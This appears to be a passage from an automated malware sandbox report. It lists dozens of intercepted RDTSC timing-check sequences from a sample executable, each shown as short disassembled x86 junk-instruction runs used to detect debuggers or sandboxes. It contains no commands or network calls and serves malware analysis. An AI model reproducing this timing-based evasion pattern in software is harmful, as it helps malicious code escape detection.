Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B09E0 second address: 10B09E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B02AE second address: 10B02C1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F78B9095CEBh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B02C1 second address: 10B02DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jmp 00007F78B909B0FCh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B65AE second address: 10B65C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B9095CF1h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B65C4 second address: 10B65E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B107h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F78B909B0F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B65E9 second address: 10B6601 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B6601 second address: 10B6608 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B6608 second address: 10B6621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B9095CECh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F78B9095CE6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B677F second address: 10B67AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F78B909B103h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F78B909B0FEh 0x00000013 push edi 0x00000014 push edi 0x00000015 pop edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B6A52 second address: 10B6A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B6D2C second address: 10B6D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B7264 second address: 10B7286 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop edi 0x00000007 jmp 00007F78B9095CF9h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B7B69 second address: 10B7B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B7B6D second address: 10B7B89 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F78B9095CE6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007F78B9095CEBh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B7B89 second address: 10B7B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B814A second address: 10B8154 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F78B9095CE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C2382 second address: 10C2386 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C24EA second address: 10C24F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C24F5 second address: 10C2500 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007F78B909B0F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C2638 second address: 10C2642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C2748 second address: 10C275C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B0FCh 0x00000009 pop edi 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C275C second address: 10C2781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F78B9095CF5h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007F78B9095CE6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C2B4A second address: 10C2B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F78B909B0F6h 0x0000000a popad 0x0000000b je 00007F78B909B102h 0x00000011 jbe 00007F78B909B0F6h 0x00000017 jns 00007F78B909B0F6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10CB000 second address: 10CB004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C91CA second address: 10C91DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F78B909B0FFh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C9746 second address: 10C974A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C974A second address: 10C9755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C9B5A second address: 10C9B5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C9B5E second address: 10C9B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F78B909B0FCh 0x0000000c jg 00007F78B909B0F6h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C9B73 second address: 10C9B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C9CBE second address: 10C9CC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C9F7F second address: 10C9F8F instructions: 0x00000000 rdtsc 0x00000002 je 00007F78B9095CE6h 0x00000008 js 00007F78B9095CE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C9F8F second address: 10C9FAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B106h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10CA6E0 second address: 10CA6F0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F78B9095CE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10E5C8B second address: 10E5C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10E5C8F second address: 10E5C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10E5C93 second address: 10E5CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F78B909B0FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10E5704 second address: 10E5710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10EA750 second address: 10EA759 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10EA759 second address: 10EA761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10EBDA8 second address: 10EBDAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10EBDAC second address: 10EBDDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F78B9095CFCh 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F78B9095CF4h 0x00000013 push ebx 0x00000014 jc 00007F78B9095CE6h 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10EBDDA second address: 10EBDEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 10F1EC4 second address: 10F1EE2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F78B9095CF9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 10F1EE2 second address: 10F1EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F78B909B0F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 10FAEFD second address: 10FAF0F instructions: 0x00000000 rdtsc 0x00000002 je 00007F78B9095CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F78B9095CFDh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 11019C6 second address: 11019CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 11019CA second address: 11019E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F78B9095CF3h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1100351 second address: 110035E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F78B909B0F6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 110035E second address: 1100366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1100366 second address: 110036C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 11004B4 second address: 11004BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1100980 second address: 1100985 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1100AF3 second address: 1100B0A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F78B9095CEEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1100B0A second address: 1100B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1100B0E second address: 1100B2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jne 00007F78B9095CE6h 0x00000010 pop edx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1100C94 second address: 1100C9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1100C9A second address: 1100CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F78B9095CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1100CA4 second address: 1100CB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1100CB5 second address: 1100CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F78B9095CEFh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F78B9095CEEh 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007F78B9095CEAh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1102FD0 second address: 1102FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1109041 second address: 110905E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CEDh 0x00000007 jl 00007F78B9095CF2h 0x0000000d jnc 00007F78B9095CE6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 110905E second address: 1109078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F78B909B102h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 113FC41 second address: 113FC5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F78B9095CF5h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 113FC5B second address: 113FC60 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 113FC60 second address: 113FC69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 114975C second address: 11497A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007F78B909B10Fh 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F78B909B107h 0x00000012 jmp 00007F78B909B108h 0x00000017 popad 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007F78B909B0F6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 11497A4 second address: 11497A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 11495EE second address: 11495FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F78B909B0FAh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 11495FD second address: 1149618 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 jmp 00007F78B9095CEBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1157BEC second address: 1157C00 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F78B909B0F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jnc 00007F78B909B0F6h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 115BC46 second address: 115BC4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 115BC4C second address: 115BC59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F78B909B0F6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 115BDB0 second address: 115BDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 115BDB6 second address: 115BDC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1221A63 second address: 1221A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1221E59 second address: 1221E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f jmp 00007F78B909B100h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1221E78 second address: 1221E84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F78B9095CE6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1221FCB second address: 1221FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F78B909B0F6h 0x0000000a jnc 00007F78B909B0F6h 0x00000010 popad 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F78B909B107h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 122242D second address: 1222431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1222431 second address: 122243B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 122243B second address: 122243F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 122243F second address: 1222445 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 122272D second address: 1222749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B9095CF8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1222749 second address: 1222796 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FFh 0x00000007 jmp 00007F78B909B101h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jmp 00007F78B909B101h 0x00000014 jmp 00007F78B909B106h 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1222912 second address: 1222918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1222918 second address: 1222940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F78B909B109h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jno 00007F78B909B0F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1224242 second address: 1224248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1224248 second address: 1224250 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1226E51 second address: 1226EA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b call 00007F78B9095CEAh 0x00000010 movsx edx, bx 0x00000013 pop edx 0x00000014 push 00000004h 0x00000016 pushad 0x00000017 mov dword ptr [ebp+12A02798h], ebx 0x0000001d or edx, dword ptr [ebp+12A02010h] 0x00000023 popad 0x00000024 call 00007F78B9095CE9h 0x00000029 jmp 00007F78B9095CF8h 0x0000002e push eax 0x0000002f js 00007F78B9095D02h 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 1226EA5 second address: 1226EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B104h 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edi 0x0000000f ja 00007F78B909B106h 0x00000015 pop edi 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a jbe 00007F78B909B0F8h 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe RDTSC instruction interceptor: First address: 12288A0 second address: 12288AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F78B9095CE6h 0x0000000a rdtsc
